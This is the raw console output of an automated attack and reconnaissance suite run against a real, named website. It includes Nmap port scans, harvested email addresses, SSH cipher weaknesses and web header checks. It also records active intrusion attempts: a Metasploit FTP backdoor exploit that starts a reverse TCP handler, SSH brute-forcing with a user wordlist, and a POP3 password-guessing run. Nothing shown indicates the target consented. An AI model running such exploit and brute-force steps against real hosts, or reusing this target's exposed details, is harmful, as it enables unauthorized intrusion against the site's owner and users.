\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  gather v0.5.0 - by @michenriksen

Processing 0 pages...

Finished processing pages:

 - Successful : 0
 - Failed     : 0

Generating report...done
Report pages generated:
#######################################################################################################################################

[+] Emails found:
--------------------------------------------------------------------------------------------------------------------------------------
No emails found

[+] Hosts found in search engines:
---------------------------------------------------------------------------------------------------------------------------------------
[-] Resolving hostnames IPs...
192.252.149.45:www.glmasonica.com
[+] Virtual hosts:
=======================================================================================================================================
192.252.149.45	puvesapuertas.com
192.252.149.45	www.glmasonica.com
192.252.149.45	www.careaction.org.hk
192.252.149.45	www.fivethousandyears.org
192.252.149.45	www.puvesapuertas.com
192.252.149.45	www.mexicanadelubricantes.com.mx
192.252.149.45	careaction.org.hk


[+] List of e-mails found:
----------------------------
glmasonica@intnet.mu
sales@icmauritius.com
info@sakoa
info@sakoa
sales@icmauritius.com

#######################################################################################################################################
PING glmasonica.com (192.252.149.45) 56(84) bytes of data.
64 bytes from 192.252.149.45 (192.252.149.45): icmp_seq=1 ttl=44 time=451 ms

--- glmasonica.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 451.921/451.921/451.921/0.000 ms

#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:35 EDT
Nmap scan report for glmasonica.com (192.252.149.45)
Host is up (0.77s latency).
Not shown: 460 closed ports, 6 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
443/tcp  open  https
587/tcp  open  submission
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
Nmap scan report for glmasonica.com (192.252.149.45)
Host is up.

PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs

Nmap done: 1 IP address (1 host up) scanned in 3.42 seconds
#######################################################################################################################################
 + -- --=[Port 21 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
Nmap scan report for glmasonica.com (192.252.149.45)
Host is up (0.20s latency).

PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using proto 1/icmp)
HOP RTT    ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.96 seconds
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.16.49-dev                         ]
+ -- --=[ 1750 exploits - 1003 auxiliary - 304 post       ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

RHOST => glmasonica.com
RHOSTS => glmasonica.com
[-] glmasonica.com:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (glmasonica.com:21).
[*] Exploit completed, but no session was created.
[*] Started reverse TCP double handler on 10.211.1.21:4444
[*] glmasonica.com:21 - Sending Backdoor Command
[-] glmasonica.com:21 - Not backdoored
[*] Exploit completed, but no session was created.
 + -- --=[Port 22 opened... running tests...
# general
(gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3
(gen) software: OpenSSH 7.4p1
(gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256                     -- [warn] unknown algorithm
(kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
                                            `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group16-sha512         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group18-sha512         -- [info] available since OpenSSH 7.3
(kex) diffie-hellman-group14-sha256         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53

# host-key algorithms
(key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) rsa-sha2-512                          -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256                          -- [info] available since OpenSSH 7.2
(key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves
                                            `- [warn] using weak random number generator could reveal the key
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519                           -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5
                                            `- [info] default cipher since OpenSSH 6.9.
(enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
(enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com                -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com                -- [info] available since OpenSSH 6.2

# message authentication code algorithms
(mac) umac-64-etm@openssh.com               -- [warn] using small 64-bit tag size
                                            `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com              -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com         -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com         -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com             -- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode
                                            `- [warn] using small 64-bit tag size
                                            `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com                  -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# algorithm recommendations (for OpenSSH 7.4)
(rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove
(rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256                  -- key algorithm to remove
(rec) -hmac-sha2-512                        -- mac algorithm to remove
(rec) -umac-128@openssh.com                 -- mac algorithm to remove
(rec) -hmac-sha2-256                        -- mac algorithm to remove
(rec) -umac-64@openssh.com                  -- mac algorithm to remove
(rec) -hmac-sha1                            -- mac algorithm to remove
(rec) -hmac-sha1-etm@openssh.com            -- mac algorithm to remove
(rec) -umac-64-etm@openssh.com              -- mac algorithm to remove

Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:37 EDT
Nmap scan report for glmasonica.com (192.252.149.45)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
|_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
|_ssh-brute: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 92:e0:eb:16:64:35:7a:26:99:37:fb:a5:d0:9f:75:9e (RSA)
|_  256 33:25:93:99:9b:e4:22:61:af:25:6b:58:67:a7:29:f9 (ED25519)
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
|_ssh-run: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|WAP
Running: iPXE 1.X, Linux 2.4.X|2.6.X
OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT        ADDRESS
1   5601.55 ms 192.252.149.45

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.78 seconds

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v4.16.49-dev                         ]
+ -- --=[ 1750 exploits - 1003 auxiliary - 304 post       ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

USER_FILE => /BruteX/wordlists/simple-users.txt
RHOSTS => glmasonica.com
[!] RHOST is not a valid option for this module. Did you mean RHOSTS?
RHOST => glmasonica.com
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
[*] glmasonica.com:22     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 closed... skipping.
 + -- --=[Port 67 closed... skipping.
 + -- --=[Port 68 closed... skipping.
 + -- --=[Port 69 closed... skipping.
 + -- --=[Port 79 closed... skipping.
 + -- --=[Port 80 opened... running tests...
#######################################################################################################################################

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: glmasonica.com:80
+ -- --=[Site not vulnerable to Cross-Site Tracing!
+ -- --=[Site not vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!

HTTP/1.1 400 Bad Request
Date: Mon, 16 Apr 2018 02:40:14 GMT
Server: Apache
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>

HTTP/1.1 400 Bad Request
Date: Mon, 16 Apr 2018 02:40:16 GMT
Server: Apache
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>
#######################################################################################################################################
+ -- --=[Checking if X-Content options are enabled on glmasonica.com...

+ -- --=[Checking if X-Frame options are enabled on glmasonica.com...

+ -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...

+ -- --=[Checking HTTP methods on glmasonica.com...

+ -- --=[Checking if TRACE method is enabled on glmasonica.com...

+ -- --=[Checking for META tags on glmasonica.com...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="Keywords" content="" />
<meta name="Description" content="" />

+ -- --=[Checking for open proxy on glmasonica.com...
<body>
    <div id="notice">
        <h1>RESOURCE NOT FOUND</h1>
        <h2><b>google.com</b></h2>
    </div>
    <div>
        server308.com: No site configured at this address.
    </div>
</body>
</html>

+ -- --=[Enumerating software on glmasonica.com...
Server: Apache

+ -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...

+ -- --=[Checking for Flash cross-domain policy on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /crossdomain.xml was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...

+ -- --=[Retrieving robots.txt on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Retrieving sitemap.xml on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /sitemap.xml was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Checking cookie attributes on glmasonica.com...
Set-Cookie: projector=949fea65f1db43f2b5c0369ddc79c6a6; path=/

+ -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
error was encountered while trying to use an ErrorDocument to handle the request.</p>
error was encountered while trying to use an ErrorDocument to handle the request.</p>


#######################################################################################################################################

    _____  .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      .1BR'''Yp, .8BR'''Cq.
   (_____)   01     01N.    C     01       C     01   .01.    01          01    Yb   01   .01.
   (() ())   01     C YCb   C     01       C     01   ,C9     01          01    dP   01   ,C9
    \   /    01     C  .CN. C     01       C     0101dC9      01          01'''bg.   0101dC9
     \ /     01     C   .01.C     01       C     01  YC.      01      ,   01    .Y   01  YC.
     /=\     01     C     Y01     YC.     ,C     01   .Cb.    01     ,C   01    ,9   01   .Cb.
    [___]  .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C .J0101Cd9  .J01L. .J01./ 2.1


------------------------------------------------------------------------------------------------------------------------

[ ! ] Starting SCANNER INURLBR 2.1 at [15-04-2018 22:41:29]
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt  ]
[ INFO ][ DORK ]::[ site:glmasonica.com ]
[ INFO ][ SEARCHING ]:: {
[ INFO ][ ENGINE ]::[ GOOGLE - www.google.sk ]

[ INFO ][ SEARCHING ]::
-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE API ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 007843865286850066037:b0heuatvay8 ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]

[ INFO ][ TOTAL FOUND VALUES ]:: [ 13 ]


 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 0 / 13 ]-[22:41:51] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 1 / 13 ]-[22:41:53] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=en ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 2 / 13 ]-[22:41:56] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=fr ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 3 / 13 ]-[22:42:01] [ - ]
|_[ + ] Target:: [ http://glmasonica.com/display/files/programme.pdf ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 4 / 13 ]-[22:42:04] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/faq.php?l=fr ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 5 / 13 ]-[22:42:06] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=fr ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 6 / 13 ]-[22:42:09] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=en ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 7 / 13 ]-[22:42:12] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=en ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 8 / 13 ]-[22:42:14] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=fr ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 9 / 13 ]-[22:42:18] [ - ]
|_[ + ] Target:: [ http://glmasonica.com/display/files/agm_fr.pdf ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 10 / 13 ]-[22:42:21] [ - ]
|_[ + ] Target:: [ http://www.glmasonica.com/display/files/agminfo_fr.pdf ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 11 / 13 ]-[22:42:26] [ - ]
|_[ + ] Target:: [ http://glmasonica.com/display/files/agm_en.pdf ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 12 / 13 ]-[22:42:29] [ - ]
|_[ + ] Target:: [ http://glmasonica.com/display/files/agminfo_en.pdf ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

[ INFO ] [ Shutting down ]
[ INFO ] [ End of process INURLBR at [15-04-2018 22:42:29]
[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt  ]
|_________________________________________________________________________________________

\_________________________________________________________________________________________/

 + -- --=[Port 110 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:42 EDT
Nmap scan report for glmasonica.com (192.252.149.45)
Host is up (0.45s latency).

PORT    STATE SERVICE VERSION
110/tcp open  pop3    Dovecot pop3d
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 55 guesses in 42 seconds, average tps: 1.5
|_  ERROR: Failed to connect.
|_pop3-capabilities: STLS RESP-CODES AUTH-RESP-CODE CAPA USER PIPELINING SASL(PLAIN) UIDL TOP
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (95%)
OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (95%), Linux 2.6.18 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   466.69 ms 192.252.149.45

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.11 seconds
 + -- --=[Port 111 closed... skipping.
 + -- --=[Port 123 closed... skipping.
 + -- --=[Port 135 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 161 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 opened... running tests...
====================================================================================
 CHECKING FOR WAF
====================================================================================

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking https://glmasonica.com
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 13

====================================================================================
 GATHERING HTTP INFO
====================================================================================
====================================================================================
 CHECKING HTTP HEADERS AND METHODS
====================================================================================

	__  ______ _____
	\ \/ / ___|_   _|
	 \  /\___ \ | |
	 /  \ ___) || |
	/_/\_|____/ |_|

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: glmasonica.com:443
+ -- --=[Site not vulnerable to Cross-Site Tracing!
+ -- --=[Site not vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!


HTTP/1.1 400 Bad Request
Date: Mon, 16 Apr 2018 02:44:07 GMT
Server: Apache
Content-Length: 362
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
 Instead use the HTTPS scheme to access this URL, please.<br />
</p>
</body></html>


====================================================================================
 CHECKING HTTP HEADERS
====================================================================================
+ -- --=[Checking if X-Content options are enabled on glmasonica.com...

+ -- --=[Checking if X-Frame options are enabled on glmasonica.com...

+ -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...

+ -- --=[Checking HTTP methods on glmasonica.com...

+ -- --=[Checking if TRACE method is enabled on glmasonica.com...

+ -- --=[Checking for META tags on glmasonica.com...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="Keywords" content="" />
<meta name="Description" content="" />

+ -- --=[Checking for open proxy on glmasonica.com...

+ -- --=[Enumerating software on glmasonica.com...
Server: Apache

+ -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...

+ -- --=[Checking for Flash cross-domain policy on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /crossdomain.xml was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...

+ -- --=[Retrieving robots.txt on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Retrieving sitemap.xml on glmasonica.com...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /sitemap.xml was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

+ -- --=[Checking cookie attributes on glmasonica.com...
Set-Cookie: projector=0ea8bbc3426586fe0d4e2372714cf441; path=/

+ -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
error was encountered while trying to use an ErrorDocument to handle the request.</p>
error was encountered while trying to use an ErrorDocument to handle the request.</p>


#######################################################################################################################################


 AVAILABLE PLUGINS
 -----------------

  PluginCertInfo
  PluginCompression
  PluginChromeSha1Deprecation
  PluginSessionResumption
  PluginOpenSSLCipherSuites
  PluginSessionRenegotiation
  PluginHSTS
  PluginHeartbleed


 CHECKING HOST(S) AVAILABILITY
 -----------------------------

   glmasonica.com:443                  => 192.252.149.45:443


 SCAN RESULTS FOR GLMASONICA.COM:443 - 192.252.149.45:443
 --------------------------------------------------------

  * Deflate Compression:
      OK - Compression disabled

  * Session Renegotiation:
      Client-initiated Renegotiations:   OK - Rejected
